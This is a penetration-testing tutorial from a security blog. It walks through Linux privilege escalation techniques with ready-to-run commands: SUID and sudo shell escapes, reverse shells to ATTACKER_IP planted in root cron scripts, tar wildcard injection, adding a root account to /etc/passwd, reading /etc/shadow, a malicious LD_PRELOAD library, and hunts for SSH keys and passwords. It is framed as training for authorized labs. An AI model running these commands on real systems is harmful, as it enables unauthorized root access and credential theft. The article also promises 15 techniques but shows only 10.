SecureCodeReviews
Application Security
linux
privilege escalation
penetration testing
suid
+3 more

Linux Privilege Escalation: 15 Techniques Hackers Use to Get Root

SCRs Team
March 7, 2026
16 min read
161 words
Share

On this page

Why Privilege Escalation MattersTechnique 1: SUID Binary ExploitationTechnique 2: Sudo MisconfigurationsTechnique 3: Cron Job ExploitationTechnique 4: Writable /etc/passwdTechnique 5: Kernel ExploitsTechnique 6: CapabilitiesTechnique 7: Writable Docker Socket

Why Privilege Escalation Matters

You've gained a shell on a Linux system — but you're a low-privilege user. Privilege escalation is how you go from www-data to root, turning limited access into total system compromise.

In pentesting: Initial access is hard. Privesc is where most targets fall. In defense: If an attacker can't escalate, a shell is far less dangerous.

Technique 1: SUID Binary Exploitation

SUID (Set User ID) binaries run with the permissions of their owner — often root.

# Find all SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \;

# /usr/bin/vim
vim -c ':!/bin/bash'

# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

# /usr/bin/nmap (older versions)
nmap --interactive
!sh

Check GTFOBins (https://gtfobins.github.io) for exploitation techniques for any binary.

Technique 2: Sudo Misconfigurations

# Check what sudo permissions you have
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim
# Exploit: sudo vim -c ':!/bin/bash'

# (ALL) NOPASSWD: /usr/bin/find
# Exploit: sudo find . -exec /bin/bash \;

# (ALL) NOPASSWD: /usr/bin/less
# Exploit: sudo less /etc/passwd → !bash

# (ALL) NOPASSWD: /usr/bin/awk
# Exploit: sudo awk 'BEGIN {system("/bin/bash")}'

# (ALL) NOPASSWD: /usr/bin/env
# Exploit: sudo env /bin/bash

# (ALL) NOPASSWD: /usr/bin/tar
# Exploit: sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Technique 3: Cron Job Exploitation

# Check for cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

# Look for writable scripts executed by root
# If /opt/backup.sh runs as root and you can write to it:
echo '/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# Look for wildcard injection in cron commands
# If cron runs: tar czf /tmp/backup.tar.gz *
# Create exploit files:
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > shell.sh

Technique 4: Writable /etc/passwd

# Check if /etc/passwd is writable
ls -la /etc/passwd

# If writable, add a root user:
# Generate password hash
openssl passwd -1 -salt xyz password123

# Add to /etc/passwd
echo 'hacker:$1$xyz$hash_here:0:0::/root:/bin/bash' >> /etc/passwd

# Login as root
su hacker

Technique 5: Kernel Exploits

# Check kernel version
uname -a
cat /proc/version

# Search for kernel exploits
# DirtyPipe (CVE-2022-0847) — Linux 5.8+
# DirtyCow (CVE-2016-5195) — Linux 2.6.22 to 4.8.3
# GameOver(lay)  (CVE-2023-2640) — Ubuntu OverlayFS

# Use linux-exploit-suggester
./linux-exploit-suggester.sh

Technique 6: Capabilities

# Find binaries with elevated capabilities
getcap -r / 2>/dev/null

# Exploitable capabilities:
# cap_setuid on python3
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_dac_read_search on tar (read any file)
tar czf /tmp/shadow.tar.gz /etc/shadow
tar xzf /tmp/shadow.tar.gz
cat etc/shadow

Technique 7: Writable Docker Socket

# Check if you're in the docker group
id | grep docker

# If yes — instant root:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Technique 8: PATH Hijacking

# If a SUID binary calls a command without full path:
# e.g., the binary runs "service apache2 restart"

# Create malicious "service" binary in a writable directory
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service

# Prepend our directory to PATH
export PATH=/tmp:$PATH

# Run the vulnerable SUID binary — it calls our "service" instead
./vulnerable-binary

Technique 9: NFS No Root Squash

# Check for NFS shares with no_root_squash
cat /etc/exports
# /shared *(rw,no_root_squash)

# From attacker machine (as root):
mount -o rw TARGET_IP:/shared /mnt
# Create SUID bash on the shared mount
cp /bin/bash /mnt/rootbash
chmod +s /mnt/rootbash

# On target machine:
/shared/rootbash -p  # Root shell!

Technique 10: Environment Variables in SUID Programs

# LD_PRELOAD (if sudo env_keep includes LD_PRELOAD)
# Create malicious shared library:
cat > /tmp/evil.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c

# Run with LD_PRELOAD
sudo LD_PRELOAD=/tmp/evil.so /usr/bin/any-allowed-sudo-command

Automated Enumeration Scripts

# LinPEAS — The gold standard
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# linux-exploit-suggester
./les.sh

Quick Reference: Escalation Checklist

# 1. System info
uname -a && cat /etc/os-release

# 2. SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null

# 3. Sudo permissions
sudo -l

# 4. Cron jobs
cat /etc/crontab && ls -la /etc/cron.d/

# 5. Writable files
find / -writable -type f 2>/dev/null | grep -v proc

# 6. Capabilities
getcap -r / 2>/dev/null

# 7. Running processes
ps aux | grep root

# 8. Network services
ss -tlnp

# 9. SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# 10. Passwords in files
grep -rli 'password' /etc/ /opt/ /var/ 2>/dev/null

Understanding these techniques helps defenders identify weaknesses before attackers do. Always practice on authorized systems like HackTheBox, TryHackMe, or your own lab machines.

Editorial standards

Published by SecureCodeReviews

This article is part of our original AI security and cybersecurity content library. We show publish and update dates, keep company and policy pages public, and update important guidance when material changes affect readers.

Named author: SCRs Team
Published: Mar 7, 2026
Update status: current publication version

Questions or corrections?

Review our editorial standards, learn more about the company, or contact us if a page needs clarification.

Secure Code Review

Want an expert review before this issue reaches production?

We combine manual code review with AppSec tooling to find vulnerabilities, logic flaws, and insecure patterns before release or audit deadlines.

Manual secure code review for real exploitable issues
Remediation guidance with clear engineering next steps
Useful for launch reviews, client audits, and security hardening

Talk to SecureCodeReviews

Get a scoped review path fast

Manual review
Actionable fixes
Fast turnaround
Security-focused

Advertisement

Free Security Tools

Try our tools now

Expert Services

Get professional help

OWASP Top 10

Learn the top risks

Related Articles

Application Security

Threat Modeling for Developers: STRIDE, PASTA & DREAD with Practical Examples

Threat modeling is the most cost-effective security activity — finding design flaws before writing code. This guide covers STRIDE, PASTA, and DREAD methodologies with real-world examples for web, API, and cloud applications.

Read more
Application Security

Building a Security Champions Program: Scaling Security Across Dev Teams

Security teams can't review every line of code. Security Champions embed security expertise in every development team. This guide covers program design, champion selection, training, metrics, and sustaining engagement.

Read more
Application Security

The Ultimate Secure Code Review Checklist for 2025

A comprehensive, language-agnostic checklist for secure code reviews. Use this as your team's standard for catching vulnerabilities before they reach production.

Read more